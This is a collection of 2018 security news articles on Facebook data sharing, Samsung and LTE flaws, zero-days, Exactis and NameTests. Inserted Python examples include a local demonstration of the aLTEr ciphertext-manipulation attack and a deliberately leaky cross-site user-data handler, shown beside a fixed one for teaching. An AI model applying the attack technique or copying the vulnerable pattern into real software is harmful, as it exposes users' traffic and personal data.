Iranian hackers are becoming even more aggressive, even though experts believe they are not particularly sophisticated.

We recently reported that the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the social network’s history: Facebook has now admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data after announcing, in 2015, that it had restricted third-party firms from accessing that data.

Immediately after the Cambridge Analytica privacy scandal, which affected 87 million users, Facebook attempted to ease media pressure by stating that it had already restricted third-party access to its users’ data in May 2015.

Friday’s 748-page report to Congress, however, confirms that the sharing with 61 tech firms continued after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and Android had become the predominant ways people around the world accessed the internet on their mobile phones. ” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network confirmed it has already ended 38 of these 52 partnerships; a further seven will be discontinued by the end of July and another by the end of October. Partnerships with Tobii (an accessibility app that enables people with ALS to access Facebook), Amazon and Apple will continue, as will the notification integrations with Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocates and security experts have described the way the social network managed users’ data, especially after 2015, as questionable.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked person can no longer see the blocker’s posts, start conversations with them on Messenger, or add them as a friend.

Facebook discovered a bug in its platform that allowed blocked users to interact with the accounts that had blocked them. As a result, blocked users were able to see some of the content posted by the individuals who had blocked them.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends. ” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, a blocked user could not see content shared only with friends, but may have been shown content shared with “friends of friends.”

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below are the details Egan shared on this bug:

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again; the company is sending a notification to the affected accounts encouraging them to check their blocked list.



A Samsung Texting App bug is sending random photos to contacts
3.7.2018 securityaffairs Mobile

Some Samsung devices are randomly sending photos taken with the camera to contacts in the address book without permission.
Do you have a Samsung smartphone? There is something you need to know.

Some devices are randomly sending photos taken with the camera to contacts in the address book without permission.

Reports so far involve Galaxy S9 and S9+ devices (Gizmodo also cites the Galaxy Note 8), but other models may be affected as well.

The news was first reported by Gizmodo after several users described the anomalous behavior on Reddit and on Samsung’s official forums.

“Sending pictures to others is one of the most basic functions of a smartphone, but when your phone’s texting app starts randomly pushing out photos without your knowledge, you got a problem..” reported Gizmodo

“And unfortunately, according to a smattering of complaints on Reddit and the official Samsung forums, it seems that’s exactly what happened to a handful of Samsung phone users, including owners of late model devices such as the Galaxy Note 8 and Galaxy S9.”

One user explained that his phone had sent all his photos to his girlfriend overnight, with no record of it in his messaging app; the activity did show up in his carrier’s logs.

“Last night around 2:30 am, my phone sent her my entire photo gallery over text but there was no record of it on my messages app. However, there was record of it on tmobile logs. Why would this happen?” wrote the user on Reddit.

The unwanted messages were sent via the Samsung Messages app; some users discovered the issue only when the recipients replied about the photos they had received.

Samsung confirmed that it is “aware of the reports” and that its technical staff is investigating the problem.


Below is the list of problems users have observed since RCS messaging was enabled; they occur with the scheduled-text feature:

Scheduled Messages are sent prematurely
Scheduled text Messages end up in WRONG threads
Messaging incorrectly displays scheduled messages as “sent” when, in fact, the other party has not received them.
Many users speculate that the glitch was introduced by the RCS messaging updates pushed by carriers.

As a temporary measure, Samsung owners can revoke Samsung Message’s permissions to access storage (Settings -> Apps -> Samsung Messages -> Permissions -> Storage).

“Concerned customers are encouraged to contact us directly at 1-800-SAMSUNG,” the company added.


Mozilla Announces Root Store Policy Update
3.7.2018 securityweek  Security

Mozilla announced on Monday that its Root Store Policy for Certificate Authorities (CAs) has been updated to version 2.6.

The Root Store Policy governs CAs trusted by Firefox, Thunderbird and other Mozilla-related software. The latest version of the policy, discussed by the Mozilla community over a period of several months, went into effect on July 1.

The new Root Store Policy includes nearly two dozen changes and some of the more important ones have been summarized in a blog post by Wayne Thayer, CA Program Manager at Mozilla.

Version 2.6 of the Root Store Policy requires CAs to clearly disclose email address validation methods in their certificate policy (CP) and certification practice statement (CPS). The CP/CPS must also clearly specify IP address validation methods, which have now been banned in specific circumstances.

CAs need to periodically obtain certain audits for their root and intermediate certificates in order to remain in the root store. Mozilla now requires auditors to provide reports written in English.

The new policy also states that starting with January 1, 2019, CAs will be required to create separate intermediate certificates for S/MIME and SSL certificates.

“Newly issued Intermediate certificates will need to be restricted with an EKU extension that doesn’t contain anyPolicy, or both serverAuth and emailProtection. Intermediate certificates issued prior to 2019 that do not comply with this requirement may continue to be used to issue new end-entity certificates,” Thayer explained.
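The EKU restriction Thayer describes can be checked mechanically. The following is an added example (not Mozilla’s code) that decodes the DER value of an ExtendedKeyUsage extension (a SEQUENCE OF OBJECT IDENTIFIER) and reports the two violations the policy names; an absent extension is also reported, since the restriction cannot be present without it. The encoder and the sample inputs exist only so the example runs offline; in practice the DER value comes from openssl or a certificate library, and the cross-certificate exception in the policy is not modelled.

```python
"""Check an intermediate CA's Extended Key Usage against the Mozilla Root Store
Policy v2.6 rule for intermediates issued from 2019: the EKU must be present and
must contain neither anyExtendedKeyUsage nor both serverAuth and emailProtection.

Added example, not Mozilla's code. Works on the raw DER value of the extension
(ExtKeyUsageSyntax ::= SEQUENCE OF OBJECT IDENTIFIER); the encoder below only
exists so the sample inputs can be constructed inline."""

ANY_EKU = "2.5.29.37.0"
SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EMAIL_PROTECTION = "1.3.6.1.5.5.7.3.4"


def _der_len(n):
    """DER length octets: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def encode_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, then base-128 arcs."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return b"\x06" + _der_len(len(out)) + bytes(out)


def encode_eku(oids):
    body = b"".join(encode_oid(o) for o in oids)
    return b"\x30" + _der_len(len(body)) + body


def _read_tlv(buf, pos):
    """Return (tag, value, position after the element)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    first = body[0]
    arcs = [first // 40, first % 40] if first < 80 else [2, first - 80]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def decode_eku(der):
    """Parse the extension value into a list of dotted OIDs; rejects anything
    that is not exactly one SEQUENCE of OIDs."""
    tag, body, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("EKU value is not a single DER SEQUENCE")
    oids, pos = [], 0
    while pos < len(body):
        tag, oid_body, pos = _read_tlv(body, pos)
        if tag != 0x06:
            raise ValueError("EKU SEQUENCE contains a non-OID element")
        oids.append(decode_oid(oid_body))
    return oids


def eku_violations(der):
    """Return the list of policy violations; an empty list means compliant."""
    if der is None:
        return ["EKU extension absent (required on new intermediates)"]
    oids = set(decode_eku(der))
    problems = []
    if ANY_EKU in oids:
        problems.append("contains anyExtendedKeyUsage")
    if SERVER_AUTH in oids and EMAIL_PROTECTION in oids:
        problems.append("contains both serverAuth and emailProtection")
    return problems


if __name__ == "__main__":
    # Constructed inputs: a TLS-only intermediate and a combined TLS+S/MIME one.
    print(eku_violations(encode_eku([SERVER_AUTH])))
    print(eku_violations(encode_eku([SERVER_AUTH, EMAIL_PROTECTION])))
```

With a real certificate, `openssl x509 -in inter.pem -noout -ext extendedKeyUsage` shows the decoded purposes directly; the parser above is for pipelines that already have the DER bytes in hand.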

Another new requirement is that root certificates must have complied with the Mozilla Root Store Policy from the moment they were created.

“This effectively means that roots in existence prior to 2014 that did not receive BR audits after 2013 are not eligible for inclusion in Mozilla’s program. Roots with documented BR violations may also be excluded from Mozilla’s root store under this policy,” Thayer said.

Mozilla takes digital certificate management very seriously. Last year it announced taking action against Chinese certificate authority WoSign and its subsidiary StartCom as a result of over a dozen incidents. It also targeted Symantec after the company and its partners were involved in several incidents involving misissued TLS certificates, and later raised concerns over DigiCert’s acquisition of Symantec’s CA business.


Facebook Notifies 800,000 Users of Blocking Bug
3.7.2018 securityweek Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations with you on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced on May 29 and addressed on June 5 led to blocked users being able to see some of the content posted by the individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs are being deprecated, in part due to low usage, while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs Vulnerability

Microsoft published technical details of 2 zero-days that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.
Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

Both issues were patched in May 2018 (Adobe for Acrobat and Reader, Microsoft with its May Patch Tuesday) before threat actors used them in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both flaws only now, to give users time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.


According to Microsoft, the weaponized PDF was at an early stage of development: the code appeared to be proof-of-concept code, and the file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.


The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the Adobe Reader vulnerability has been exploited, the attacker leverages the Windows zero-day to escape the sandbox: the Win32k flaw lets the shellcode elevate its privileges by running code in kernel mode, breaking out of the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, both firms also shared the IoCs for the exploits.


NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers. “

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata for certain types of calls involving persons of interest whose activity may pose a threat to homeland security.

The National Security Agency received more call detail records (CDRs) than it was allowed to retain under the current legal framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate the properly produced records.

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency began deleting the CDRs on May 23 this year, more than a month ago.


The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice that notified it to the Foreign Intelligence Surveillance Court.

This isn’t the first time that such kind of incident occurs, civil liberties journalist Marcy Wheeler published last year a catalog for all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.


Researchers Create Attacks That Compromise LTE Data Communication
2.7.2018 securityweek Attack

Newly devised attacks on the Long Term Evolution (LTE) high-speed wireless standard break the confidentiality and privacy of communication, a team of researchers claim.

In a newly published paper (PDF), researchers from Ruhr-University Bochum and New York University Abu Dhabi present a set of attacks against LTE’s data link layer (layer two) protocols, which could be used to identify mobile users within a cell, learn what websites the user visits, and even modify the message payload.

A stealthy attacker, the researchers say, could perform an identity mapping attack, linking the user’s temporary network identity (TMSI) to the temporary radio identity (RNTI). Neither identifier is known to the attacker beforehand, but both are contained in the radio packets.

“More specifically, we demonstrate how an attacker can precisely localize and identify a user within the cell, distinguish multiple transmission streams, and use this information as a stepping stone for subsequent attacks,” the researchers note.

Using common paging techniques, the researchers were also able to identify and localize specific users for a pre-known TMSI within the cell. This, however, requires the use of an active interface, meaning that the attack becomes detectable.

The researchers also demonstrate that, even for encrypted transmissions, plaintext information up to the Packet Data Convergence Protocol (PDCP) can be accessed, thus de-anonymizing connections otherwise considered secure due to encryption.

Targeting Tor with their website fingerprinting attack, the researchers revealed that information leaks in the metadata of a connection could be used to distinguish between different websites. They also demonstrated how website fingerprinting can be mapped to LTE layer two attacks.

Although they achieved a high success rate with such an attack, the researchers explain that the experiments were performed on a closed LTE network completely under their control and on a small set of websites.

In addition to these passive attacks, the researchers devised an active attack on LTE’s layer two protocols. Called aLTEr, it “exploits the missing integrity protection of LTE user data to perform a chosen-ciphertext attack,” affects all LTE devices and has implications up to the application layer, the research paper reads.

For this attack scenario, the researchers used a malicious relay within the vicinity of the user, which intercepts DNS requests from the mobile device and uses a manipulation mask to change the original IP address to that of the malicious DNS server.

The request is then forwarded to the commercial network, which sends it to the malicious server, and an additional manipulation in the downlink path ensures that the source IP address matches the target, thus rendering the attack undetected.
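The “manipulation mask” works because LTE encrypts user data with a stream cipher (AES in counter mode, EEA2) and adds no integrity tag: XORing a mask into the ciphertext XORs the same mask into the plaintext, so a relay that knows or guesses the original destination address can rewrite it without any key material. The following is an added example, not the researchers’ code. The keystream is a counter-mode construction from HMAC-SHA256 standing in for AES-CTR (the malleability depends only on the XOR structure, not on the block cipher); the record layout (4-byte source IP, 4-byte destination IP, payload), the addresses and all keys are constructed for the demo, and a real IPv4 header also carries a checksum over its fields, which this toy record omits.

```python
"""Why missing integrity protection on LTE user data matters: with a stream
cipher, XORing a mask into the ciphertext XORs the same mask into the plaintext,
so a relay that guesses the original destination IP can redirect a DNS request
to its own resolver without knowing the key.

Added example, not the researchers' code. HMAC-SHA256 in counter mode stands in
for AES-CTR (EEA2); record layout, addresses and keys are constructed."""

import hashlib
import hmac
import ipaddress
import secrets
import struct

DST_OFFSET = 4  # destination IP occupies bytes 4..7 of the toy record


def keystream(key, nonce, length):
    """Counter-mode keystream: block i = HMAC(key, nonce || i)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key, nonce, plaintext):
    """Stream-cipher encryption; decryption is the same operation."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


decrypt = encrypt


def build_record(src_ip, dst_ip, payload):
    return ipaddress.IPv4Address(src_ip).packed + ipaddress.IPv4Address(dst_ip).packed + payload


def parse_record(record):
    return (str(ipaddress.IPv4Address(record[:4])),
            str(ipaddress.IPv4Address(record[4:8])),
            record[8:])


def alter_ciphertext(ciphertext, guessed_dst_ip, attacker_dst_ip):
    """The relay's step: mask = guessed_dst XOR attacker_dst, applied to the
    ciphertext bytes carrying the destination address. No key needed."""
    mask = xor_bytes(ipaddress.IPv4Address(guessed_dst_ip).packed,
                     ipaddress.IPv4Address(attacker_dst_ip).packed)
    altered = bytearray(ciphertext)
    for i, m in enumerate(mask):
        altered[DST_OFFSET + i] ^= m
    return bytes(altered)


def mac(mac_key, nonce, ciphertext):
    """Integrity tag over the ciphertext (encrypt-then-MAC): the protection
    LTE's user plane lacks, and what makes the manipulation detectable."""
    return hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()


def verify(mac_key, nonce, ciphertext, tag):
    return hmac.compare_digest(mac(mac_key, nonce, ciphertext), tag)


def demo():
    """Run the attack on a constructed DNS request and report what the network
    sees with and without an integrity check."""
    enc_key, mac_key = secrets.token_bytes(16), secrets.token_bytes(16)
    nonce = secrets.token_bytes(8)
    query = b"DNS query: example.com A?"                        # constructed payload
    record = build_record("10.0.0.2", "198.51.100.53", query)  # UE -> operator resolver
    ciphertext = encrypt(enc_key, nonce, record)
    tag = mac(mac_key, nonce, ciphertext)

    # Relay in the middle: knows (or guesses) only the operator's resolver address.
    altered = alter_ciphertext(ciphertext, "198.51.100.53", "203.0.113.7")
    _, dst_seen, payload_seen = parse_record(decrypt(enc_key, nonce, altered))
    return {
        "destination_after_attack": dst_seen,      # attacker's resolver
        "payload_intact": payload_seen == query,   # rest of the packet unchanged
        "integrity_check_on_original": verify(mac_key, nonce, ciphertext, tag),
        "integrity_check_on_altered": verify(mac_key, nonce, altered, tag),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The same redirection on the downlink (rewriting the source address of the reply back to the resolver the device expected) is what keeps the attack invisible to the user, and the HMAC check is the kind of countermeasure the paper asks the 5G specification to mandate.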

The attack, however, poses several challenges, such as luring the user into connecting to the malicious relay and maintaining a stable radio connection, and identifying the DNS requests and responses among the transmitted packets. Packet manipulation is another issue an attacker would face.

After testing the ALTER attack in a real-world setup, the researchers determined it is a feasible assault scenario. By forwarding all messages between the user device and the network, the malicious relay remains undetectable. The attack, the researchers claim, is possible despite the LTE Authentication and Key Agreement (AKA) being formally proven secure.

“While lots of research effort in LTE security focuses on the physical and network layers, the data link layer has remained unexplored until now. […] Based on our findings, we urgently demand the implementation of effective countermeasures in the upcoming 5G specification to assure the security and privacy of future mobile communication,” the paper concludes.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.2018 securityweek  Incident

Security Researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one uses Elasticsearch, which allows easy data searching over the internet. Elasticsearch offers security including authentication and role-based access control -- but not all customers deploy it.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eighty-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI, and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 2018 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 2018 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek  Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook being publicly exposed.

Patched as part of Facebook’s Data Abuse Bounty Program, the vulnerability caused Nametests.com to serve users’ data to any third party that requested it, something that should not normally happen.

Facebook launched its Data Abuse Bounty Program in April as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, and admitted to tracking people across the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

Websites should not normally be able to access this information, as web browsers block a page from reading responses fetched from another site. The data served by Nametests.com, however, was wrapped in JavaScript, which any page can load as a script, meaning that it could be shared with other websites.
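The cross-site leak described here, as an added example that is not Nametests’ or Facebook’s code: a handler that emits user data as a JavaScript file, beside a hardened handler that serves plain JSON only to same-origin requests. The endpoint behaviour, header names and the user record are assumptions.

```python
import json

# Constructed record standing in for what the appconfig_user endpoint returned.
USER_RECORD = {"id": 12345, "name": "Example User", "email": "user@example.org"}


def vulnerable_response(request_headers):
    """'Before' pattern: the user's data is emitted as executable JavaScript to
    whoever asks. A <script src=...> tag on any third-party page makes the
    victim's browser load it with the victim's cookies and run it, so that
    page can simply read window.appconfig_user."""
    body = "window.appconfig_user = " + json.dumps(USER_RECORD) + ";"
    return 200, {"Content-Type": "application/javascript"}, body


def hardened_response(request_headers):
    """'After' pattern: plain JSON, served only to same-origin requests.

    Sec-Fetch-Site / Sec-Fetch-Dest are set by the browser and cannot be
    forged by page script: a <script> include from another site arrives as
    cross-site + script and is refused; requests lacking the headers are
    refused too (fail closed). application/json with nosniff ensures the body
    is never executed as a script even if it is served. A SameSite attribute
    on the session cookie would be an independent second layer."""
    site = request_headers.get("Sec-Fetch-Site", "cross-site")
    dest = request_headers.get("Sec-Fetch-Dest", "")
    if site not in ("same-origin", "none") or dest == "script":
        return 403, {"Content-Type": "application/json"}, json.dumps({"error": "forbidden"})
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Cache-Control": "no-store",
    }
    return 200, headers, json.dumps(USER_RECORD)


def leaks_to_script_include(handler):
    """Simulate a third-party page including the endpoint via <script>: the
    browser sends the victim's cookies plus cross-site fetch metadata.
    True if the handler hands that page executable, personal data."""
    headers = {"Cookie": "session=constructed-victim-cookie",
               "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "script"}
    status, resp_headers, body = handler(headers)
    is_script = resp_headers.get("Content-Type", "").startswith("application/javascript")
    return status == 200 and is_script and USER_RECORD["email"] in body


def same_origin_fetch(handler):
    """Simulate the site's own page calling the endpoint with fetch(); returns
    the parsed record, or None if the request was refused."""
    headers = {"Cookie": "session=constructed-victim-cookie",
               "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Dest": "empty"}
    status, _, body = handler(headers)
    return json.loads(body) if status == 200 else None
```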

“Since NameTests displayed their user’s personal data in a JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information continued to be exposed even after a user deleted the application. With no logout functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

